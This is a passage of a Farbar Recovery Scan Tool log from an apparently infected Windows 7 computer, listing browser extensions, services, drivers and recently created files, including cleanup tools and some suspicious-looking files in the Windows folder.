CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bghejdcdajlenjngcknlkkoakmmjfanb] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [cckdoammdligdedbakcgnmegjljgipjb] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [clmghkfhfkcfhpccgbafbailibgogkbi] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [eajjckckolcbgmmenaiiigegbadpeghb] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [eoepodkgpakekgncgnfnijcippobokhp] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [iadddcofhgaeeniecnhpopipbhijnphj] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [iedokolghlgkcnafplkbjeokfamliokd] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jddmfogomafbmjkfcpfpnjfgecnjffng] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kpmccjcnkhkgcipodalpmbpighkgiaif] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lopcjmbilgeapfldddijpgpahphngjdk] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mhgliccaogcekoldfmachhehepjdfobj] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nfkbfmjkmioenefhjdonleflegoephgm] - https://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pedogdjgmjlabbbdhokgdafpglnjinhc] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\Exts\Chrome.crx [2015-06-08]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 BrcmMgmtAgent; C:\Program Files\Broadcom\MgmtAgent\BrcmMgmtAgent.exe [158720 2010-06-29] (Broadcom Corporation) [File not signed]
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1394816 2015-05-01] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1772672 2015-05-01] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2736824 2015-04-07] (Microsoft Corporation)
R2 FileZilla Server; C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe [630272 2011-06-07] (FileZilla Project) [File not signed]
R2 HitmanProScheduler; C:\Program Files\HitmanPro\hmpsched.exe [127752 2015-05-27] (SurfRight B.V.)
R2 MbaeSvc; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [656184 2015-04-08] (Malwarebytes Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1080120 2015-04-14] (Malwarebytes Corporation)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.130\McCHSvc.exe [288776 2013-09-06] (McAfee, Inc.)
R2 MSSQL$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL11.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [191064 2012-02-11] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\N360.exe [265000 2015-03-26] (Symantec Corporation)
R2 O2FLASH; C:\Windows\system32\o2flash.exe [244328 2011-11-16] (O2Micro International)
R2 O2SDIOAssist; c:\Windows\SysWOW64\srvany.exe [8192 2003-04-18] () [File not signed]
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [1931632 2015-04-19] (Electronic Arts)
S3 SecureStorageService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Secure Storage Manager\SecureStorageService.exe [2117120 2010-11-03] (Wave Systems Corp.) [File not signed]
S4 SQLAgent$SQLEXPRESS; c:\Program Files\Microsoft SQL Server\MSSQL11.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [597080 2012-02-11] (Microsoft Corporation)
S2 svcGenericHost; c:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe [45056 2010-07-05] (Trend Micro Inc.) [File not signed]
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S2 tcsd_win32.exe; C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1629696 2010-07-13] () [File not signed]
R2 VMAuthdService; C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe [79872 2012-06-09] (VMware, Inc.) [File not signed]
R2 W3SVC; C:\Windows\system32\inetsrv\iisw3adm.dll [453120 2010-11-20] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZcfgSvc7; C:\Program Files\Intel\WiFi\bin\ZCfgSvc7.exe [992256 2010-12-23] (Intel® Corporation) [File not signed]
S2 HandsFree Client; C:\Program Files (x86)\HandsFree\Client\srvc.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20150601.001\BHDrvx64.sys [1640152 2015-06-01] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1507000.00B\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [489776 2015-06-07] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [145200 2015-06-07] (Symantec Corporation)
R1 ESProtectionDriver; C:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [63064 2015-04-08] ()
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20150605.001\IDSvia64.sys [684248 2015-06-05] (Symantec Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-04-14] (Malwarebytes Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [136408 2015-06-06] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-04-14] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20150607.020\ENG64.SYS [129752 2015-06-07] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20150607.020\EX64.SYS [2137304 2015-06-07] (Symantec Corporation)
S4 RsFx0200; C:\Windows\System32\DRIVERS\RsFx0200.sys [334936 2012-02-11] (Microsoft Corporation)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1507000.00B\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1507000.00B\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1507000.00B\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1507000.00B\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2015-06-07] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1507000.00B\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1507000.00B\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)
R2 VMparport; C:\Windows\system32\drivers\VMparport.sys [31384 2012-06-09] (VMware, Inc.)
S3 cpuz134; \??\C:\Users\DELL2~1\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-06-08 12:56 - 2015-06-08 12:57 - 00032537 _____ C:\Users\dell 2\Downloads\FRST.txt
2015-06-08 12:56 - 2015-06-08 12:57 - 00000000 ____D C:\FRST
2015-06-08 12:55 - 2015-06-08 12:55 - 02108928 _____ (Farbar) C:\Users\dell 2\Downloads\FRST64.exe
2015-06-08 04:31 - 2015-06-08 04:31 - 00000000 ____D C:\Windows\System32\Tasks\Norton Security Suite
2015-06-08 03:57 - 2015-06-08 04:18 - 00000000 ____D C:\Users\dell 2\AppData\Local\NPE
2015-06-08 03:36 - 2015-06-08 03:36 - 00001063 _____ C:\Users\dell 2\Desktop\JRT.txt
2015-06-08 01:41 - 2015-06-08 01:41 - 00000000 ____D C:\N360_BACKUP
2015-06-08 01:11 - 2015-05-22 14:18 - 01021440 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00757248 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00423424 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00227328 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2015-06-08 01:11 - 2015-05-22 14:18 - 00045568 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2015-06-08 01:11 - 2015-05-22 14:13 - 01119232 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2015-06-08 01:11 - 2015-05-21 09:19 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2015-06-07 16:52 - 2015-06-08 04:25 - 00003228 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2015-06-07 16:52 - 2015-06-08 04:25 - 00002442 _____ C:\Users\Public\Desktop\Norton Security Suite.lnk
2015-06-07 16:52 - 2015-06-07 16:52 - 00177752 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2015-06-07 16:52 - 2015-06-07 16:52 - 00008222 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
2015-06-07 16:52 - 2015-06-07 16:52 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2015-06-07 16:51 - 2015-06-08 04:26 - 00000000 ____D C:\Windows\system32\Drivers\N360x64
2015-06-07 16:51 - 2015-06-08 04:25 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite
2015-06-07 16:51 - 2015-06-07 16:51 - 00000000 ____D C:\Program Files (x86)\Norton Security Suite
2015-06-07 16:41 - 2015-06-08 02:00 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Norton
2015-06-07 16:41 - 2015-06-07 16:41 - 01021632 _____ (Symantec Corporation) C:\Users\dell 2\Downloads\Norton_Download_Manager (1).exe
2015-06-07 13:36 - 2015-06-07 13:36 - 05628238 _____ (Swearware) C:\Users\dell 2\Downloads\ComboFix.exe
2015-06-07 03:53 - 2015-06-07 03:53 - 00002261 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-06-07 03:53 - 2015-06-07 03:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-06-07 03:52 - 2015-06-07 04:23 - 06103040 _____ C:\Program Files (x86)\GUT9627.tmp
2015-06-07 03:52 - 2015-06-07 03:52 - 00000000 ____D C:\Program Files (x86)\GUM9626.tmp
2015-06-06 20:08 - 2015-06-06 20:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Exploit
2015-06-06 20:07 - 2015-06-08 12:45 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Exploit
2015-06-06 20:07 - 2015-06-08 12:25 - 00000000 ____D C:\ProgramData\Malwarebytes Anti-Exploit
2015-06-06 19:51 - 2015-06-06 19:51 - 00002984 _____ C:\Windows\System32\Tasks\{0A48383E-28B8-4E3F-9733-DE0573B61731}
2015-06-06 14:10 - 2015-06-06 14:10 - 01391104 _____ C:\Users\dell 2\Downloads\apploc.msi
2015-06-06 02:40 - 2015-06-06 02:40 - 00000000 __SHD C:\found.000
2015-06-06 00:26 - 2015-06-06 00:27 - 00039196 _____ C:\Users\dell 2\Downloads\software_removal_tool.log
2015-06-06 00:26 - 2015-06-06 00:27 - 00000312 _____ C:\Windows\Tasks\Software Removal Tool logs upload retry.job
2015-06-06 00:26 - 2015-06-06 00:26 - 04715848 _____ (Google) C:\Users\dell 2\Downloads\software_removal_tool.exe
2015-06-06 00:26 - 2015-06-06 00:26 - 00000098 _____ C:\Users\dell 2\Downloads\debug.log
2015-06-05 23:30 - 2015-06-05 23:30 - 00046823 _____ C:\Users\dell 2\Desktop\Result.txt
2015-06-05 21:23 - 2015-06-07 03:53 - 00000000 ____D C:\Users\dell 2\AppData\Local\Google
2015-06-05 02:28 - 2015-06-05 02:28 - 00002165 _____ C:\Users\dell 2\Desktop\Tweaking.com - Windows Repair.lnk
2015-06-05 02:28 - 2015-06-05 02:28 - 00000574 _____ C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job
2015-06-05 02:28 - 2015-06-05 02:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2015-06-05 02:28 - 2015-06-05 02:28 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2015-06-05 02:27 - 2015-06-08 03:38 - 00000000 ____D C:\AdwCleaner
2015-06-05 02:27 - 2015-06-05 02:27 - 12881704 _____ C:\Users\dell 2\Downloads\tweaking.com_windows_repair_aio_setup.exe
2015-06-05 02:26 - 2015-06-05 02:27 - 02231296 _____ C:\Users\dell 2\Downloads\adwcleaner_4.206.exe
2015-06-05 01:55 - 2015-06-05 01:55 - 02942610 _____ (Thisisu) C:\Users\dell 2\Downloads\JRT.exe
2015-06-05 01:55 - 2015-06-05 01:55 - 00000207 _____ C:\Windows\tweaking.com-regbackup-SEVILLE-Windows-7-Professional-(64-bit).dat
2015-06-05 01:55 - 2015-06-05 01:55 - 00000000 ____D C:\RegBackup
2015-06-05 01:08 - 2015-06-05 09:32 - 00000000 ____D C:\Users\dell 2\Desktop\Old Firefox Data
2015-06-05 00:42 - 2015-06-05 00:42 - 00000000 __SHD C:\Users\dell 2\AppData\Local\EmieUserList
2015-06-05 00:42 - 2015-06-05 00:42 - 00000000 __SHD C:\Users\dell 2\AppData\Local\EmieSiteList
2015-06-05 00:42 - 2015-06-05 00:42 - 00000000 __SHD C:\Users\dell 2\AppData\Local\EmieBrowserModeList
2015-06-05 00:12 - 2015-06-05 00:12 - 00009928 _____ C:\Windows\system32\.crusader
2015-06-04 20:14 - 2015-06-04 20:14 - 00000017 _____ C:\Windows\SysWOW64\shortcut_ex.dat
2015-06-04 20:10 - 2015-06-04 20:10 - 00000000 ____D C:\Windows\pss
2015-06-02 11:31 - 2015-06-02 11:31 - 00049208 _____ C:\Users\dell 2\Downloads\Star.bmp
2015-05-31 22:16 - 2015-05-31 22:27 - 00000000 ____D C:\Users\dell 2\Downloads\Artificial Academy 2
2015-05-31 21:42 - 2015-06-06 21:07 - 00000000 ____D C:\illusion
2015-05-31 19:32 - 2015-05-31 19:32 - 00000000 ____D C:\Windows\Lists
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\system32\ysxja.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00295424 _____ (Groom-A-Zebu ™ ) C:\Windows\cygavb.exe
2015-05-31 19:32 - 2015-04-25 05:18 - 00053248 _____ C:\Windows\zlib.dll
2015-05-31 19:32 - 2013-12-05 07:36 - 00003542 _____ C:\Windows\mstdcvtr.bat
2015-05-31 19:32 - 2013-06-05 08:38 - 00004122 _____ C:\Windows\plofgye
2015-05-31 19:32 - 2013-06-05 08:37 - 00004194 _____ C:\Windows\soxe
2015-05-31 19:32 - 2013-06-05 08:36 - 00000038 _____ C:\Windows\initcvtr.bat
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\Drivers\healusb.sys
2015-05-31 19:32 - 2013-01-06 07:43 - 00000074 _____ C:\Windows\system32\cygwin.sys
2015-05-31 19:32 - 2012-12-17 07:45 - 00018559 _____ C:\Windows\default.cfg
2015-05-31 19:32 - 2012-07-09 11:02 - 00279552 _____ (Eric Lawrence) C:\Windows\FiddlerCore4.dll
2015-05-31 19:30 - 2015-05-31 19:30 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\DAEMON Tools Lite
2015-05-31 19:29 - 2015-05-31 19:29 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2015-05-31 18:29 - 2015-05-31 18:29 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\WinRAR
2015-05-31 17:37 - 2015-05-31 17:37 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\PowerISO
2015-05-31 17:26 - 2015-05-31 17:26 - 00000987 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2015-05-31 17:26 - 2015-05-31 17:26 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-05-31 17:26 - 2015-05-31 17:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-05-31 17:26 - 2015-05-31 17:26 - 00000000 ____D C:\Program Files\WinRAR
2015-05-31 17:25 - 2015-05-31 17:25 - 01941744 _____ C:\Users\dell 2\Downloads\winrar-x64-521.exe
2015-05-31 17:22 - 2015-05-31 17:22 - 00000814 _____ C:\Users\Public\Desktop\PowerISO.lnk
2015-05-31 17:22 - 2015-05-31 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO
2015-05-31 17:22 - 2015-05-31 17:22 - 00000000 ____D C:\Program Files\PowerISO
2015-05-31 17:22 - 2015-04-07 22:01 - 00127760 _____ (Power Software Ltd) C:\Windows\system32\Drivers\scdemu.sys
2015-05-31 17:19 - 2015-05-31 17:20 - 03097024 _____ (Power Software Ltd) C:\Users\dell 2\Downloads\PowerISO6-x64.exe
2015-05-31 17:18 - 2015-06-05 13:03 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\BitTorrent
2015-05-30 13:03 - 2015-05-30 13:03 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\dlg
2015-05-30 12:57 - 2015-06-06 22:15 - 00136408 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-05-30 12:57 - 2015-05-30 12:57 - 00001108 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-05-30 12:57 - 2015-05-30 12:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-05-30 12:57 - 2015-05-30 12:57 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-05-30 12:57 - 2015-04-14 09:37 - 00107736 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-05-30 12:57 - 2015-04-14 09:37 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-05-30 12:57 - 2015-04-14 09:37 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-05-30 12:54 - 2015-05-30 12:54 - 21546080 _____ (Malwarebytes Corporation ) C:\Users\dell 2\Downloads\mbam-setup-2.1.6.1022.exe
2015-05-28 11:53 - 2015-05-28 11:57 - 00000000 ____D C:\Users\dell 2\AppData\Local\WinZip
2015-05-28 11:53 - 2015-05-28 11:55 - 00000000 ____D C:\ProgramData\WinZip
2015-05-28 11:53 - 2015-05-28 11:53 - 00002289 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinZip.lnk
2015-05-28 11:53 - 2015-05-28 11:53 - 00002283 _____ C:\Users\Public\Desktop\WinZip.lnk
2015-05-28 11:53 - 2015-05-28 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
2015-05-28 11:53 - 2015-05-28 11:53 - 00000000 ____D C:\Program Files\WinZip
2015-05-28 11:52 - 2015-05-28 11:52 - 00000000 ____D C:\ProgramData\UniqueId
2015-05-28 11:51 - 2015-05-28 11:51 - 00714376 _____ (WinZip Computing, S.L.) C:\Users\dell 2\Downloads\winzip19-new.exe
2015-05-27 12:05 - 2015-05-27 12:05 - 00001899 _____ C:\Users\Public\Desktop\HitmanPro.lnk
2015-05-27 12:05 - 2015-05-27 12:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HitmanPro
2015-05-27 12:05 - 2015-05-27 12:05 - 00000000 ____D C:\Program Files\HitmanPro
2015-05-27 12:04 - 2015-05-27 12:04 - 11024496 _____ (SurfRight B.V.) C:\Users\dell 2\Downloads\HitmanPro_x64.exe
2015-05-27 11:51 - 2015-05-27 11:51 - 51789024 _____ (Microsoft Corporation) C:\Users\dell 2\Downloads\Windows-KB890830-x64-V5.24.exe
2015-05-13 03:04 - 2015-05-01 09:17 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-05-13 03:04 - 2015-05-01 09:16 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-05-12 18:27 - 2015-02-18 03:06 - 00123904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2015-05-12 18:27 - 2015-02-18 03:04 - 00142336 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2015-05-12 18:26 - 2015-05-04 21:29 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-05-12 18:26 - 2015-05-04 21:12 - 00248832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2015-05-12 18:26 - 2015-04-27 15:28 - 05569984 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-05-12 18:26 - 2015-04-27 15:28 - 00155584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2015-05-12 18:26 - 2015-04-27 15:28 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2015-05-12 18:26 - 2015-04-27 15:26 - 01728960 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 01461760 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 01254400 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 01162752 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\tdh.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00113664 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2015-05-12 18:26 - 2015-04-27 15:23 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2015-05-12 18:26 - 2015-04-27 15:22 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\logman.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00047104 _____ (Microsoft Corporation) C:\Windows\system32\typeperf.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\relog.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2015-05-12 18:26 - 2015-04-27 15:22 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\diskperf.exe
2015-05-12 18:26 - 2015-04-27 15:21 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2015-05-12 18:26 - 2015-04-27 15:16 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004608 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2015-05-12 18:26 - 2015-04-27 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
